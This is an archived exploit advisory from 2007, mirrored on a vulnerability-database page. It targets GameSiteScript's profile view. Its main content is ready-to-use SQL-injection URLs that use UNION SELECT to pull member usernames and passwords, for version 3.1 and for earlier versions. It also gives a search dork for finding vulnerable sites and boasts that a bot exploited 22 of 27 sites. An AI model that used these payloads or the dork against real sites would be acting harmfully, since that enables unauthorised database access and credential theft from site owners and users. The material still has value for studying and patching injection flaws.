Lucene search
K

gss31-sql.txt

🗓️ 10 Jul 2007 00:00:00Reported by Xenduer77Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

GameSiteScript Profile SQL-Injection Exploit July 7th, 2007

Code
`###############################################  
####### GameSiteScript (Profile)($id) SQL-Injection Exploit  
###############################################  
### Vulnerability Discovered By: Xenduer77  
### ---July 7th, 2007  
###############################################  
  
{$id} Is passed straight to the query without being filtered.  
  
###############################################  
SQL-INJECTION:  
###############################################  
  
For Version 3.1:  
-------  
http://whatever.com/iindex.php?params=profile/view/'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0,0,0+from+members+where+id='1  
  
Prior To 3.1:  
-------  
http://whatever.com/index.php?params=profile/view/'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0+from+members+where+id='1  
  
###Tested by a bot on 27 sites, 22 were exploited.  
  
###############################################  
  
Dork: "Powered by GameSiteScript"  
  
###############################################  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation